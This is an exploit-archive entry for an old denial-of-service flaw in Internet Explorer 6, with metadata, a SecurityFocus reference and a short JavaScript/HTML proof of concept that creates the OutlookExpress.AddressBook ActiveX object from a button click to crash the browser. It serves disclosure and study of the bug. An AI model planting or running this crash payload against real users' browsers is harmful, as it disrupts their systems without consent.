Microsoft Internet Explorer 6 - OutlookExpress.AddressBook Denial of Service

Author: hdm
type: dos
platform: windows
port: 
date_added: 2006-07-01 
date_updated: 2013-09-07 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/18771/info

Microsoft Internet Explorer is prone to a denial-of-service condition when processing the 'OutlookExpress.AddressBook' COM object.

A successful attack may cause the browser to fail due to a null-pointer dereference.

// MoBB Demonstration
function Demo() {
	var a = new ActiveXObject("OutlookExpress.AddressBook");
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>